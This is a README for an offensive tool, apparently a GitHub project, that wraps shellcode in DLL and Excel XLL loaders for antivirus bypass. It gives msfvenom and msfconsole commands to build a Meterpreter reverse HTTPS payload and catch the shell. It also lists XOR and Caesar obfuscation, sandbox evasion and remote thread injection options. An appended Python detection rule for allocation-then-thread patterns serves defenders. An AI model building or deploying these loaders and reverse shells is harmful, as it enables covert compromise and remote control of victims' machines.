cepxeo/dll4shell

C++ shellcode launcher

A collection of DLL wrappers around various shellcode injection and obfuscation techniques. Based on the charlotte tool.

Execution steps

git clone https://github.com/cepxeo/dll4shell && cd dll4shell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=YOUR_IP LPORT=443 EXITFUNC=thread -f raw -e x64/xor_dynamic -a x64 -o beacon.bin

sudo apt install mingw-w64

python dll4shell.py -e xor -o dll

sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST YOUR_IP; set LPORT 8443; exploit"

Techniques used (-e parameter):

| Value | Obfuscation method, Details | Injection type | Code invocation |
|---|---|---|---|
| xor | XOR | Local | VirtualAlloc, CreateThread |
| xor1 | XOR, sandbox evasion | Remote | VirtualAllocEx, CreateRemoteThread |
| xor2 | XOR, sandbox evasion | Local | hHeapAlloc, hCreateThread |
| shift | Caesar | Local | VirtualAlloc, CreateThread |
| shift1 | Caesar, sandbox evasion | Remote | VirtualAllocEx, CreateRemoteThread |

Outputs (-o parameter):

| Value | Details |
|---|---|
| dll | DLL callable via rundll32 |
| xll | XLL callable via Add-Ins |
| payload | save encrypted payload only |
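
For defenders, the allocation and thread-creation pairs in the techniques table, combined with the host processes implied by the output types (rundll32 for DLLs, Excel for XLL add-ins), give a correlation rule. The following is an added example, not code from the dll4shell repository; the event tuple format, the sample events (constructed), and the assumption that hHeapAlloc/hCreateThread appear in telemetry as HeapAlloc/CreateThread are all hypothetical.

```python
# Added example: constructed API-call telemetry, not output of any real EDR.
# Each event: (timestamp, host process image, pid, API name, target pid).
EVENTS = [
    (1, "rundll32.exe", 4100, "VirtualAlloc", 4100),
    (2, "rundll32.exe", 4100, "CreateThread", 4100),
    (3, "excel.exe", 5200, "VirtualAllocEx", 6300),
    (4, "excel.exe", 5200, "CreateRemoteThread", 6300),
    (5, "rundll32.exe", 4400, "HeapAlloc", 4400),
    (6, "rundll32.exe", 4400, "CreateThread", 4400),
    (7, "notepad.exe", 7000, "VirtualAlloc", 7000),   # not a loader host
    (8, "notepad.exe", 7000, "CreateThread", 7000),
    (9, "rundll32.exe", 4800, "CreateThread", 4800),  # no prior allocation seen
]

# Allocation/invocation pairs from the README's "Code invocation" column.
# Assumption: hHeapAlloc/hCreateThread surface as HeapAlloc/CreateThread.
PAIRS = {
    ("VirtualAlloc", "CreateThread"): "local",
    ("HeapAlloc", "CreateThread"): "local-heap",
    ("VirtualAllocEx", "CreateRemoteThread"): "remote",
}
ALLOC_APIS = {alloc for alloc, _ in PAIRS}
# Host processes matching the README's output types (DLL via rundll32, XLL via Excel).
LOADER_HOSTS = {"rundll32.exe", "excel.exe"}

def find_alloc_then_thread(events):
    """Return alerts for loader hosts that allocate memory and then start a thread."""
    pending = {}  # (pid, target pid) -> allocation APIs seen so far
    alerts = []
    for ts, image, pid, api, target in sorted(events):
        if image.lower() not in LOADER_HOSTS:
            continue
        key = (pid, target)
        if api in ALLOC_APIS:
            pending.setdefault(key, []).append(api)
            continue
        for alloc in pending.get(key, []):
            kind = PAIRS.get((alloc, api))
            if kind is None:
                continue
            # Remote pairs only count when the target is another process.
            if (kind == "remote") != (target != pid):
                continue
            alerts.append({"pid": pid, "image": image, "kind": kind, "target": target})
            pending[key] = []  # consume the allocation: one alert per matched pair
            break
    return alerts
```

These API pairs are common in benign software, so the signal comes from the ordering together with the restriction to the loader host processes; treat a match as a lead to corroborate, not a verdict.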

About

Shellcode launcher for AV bypass
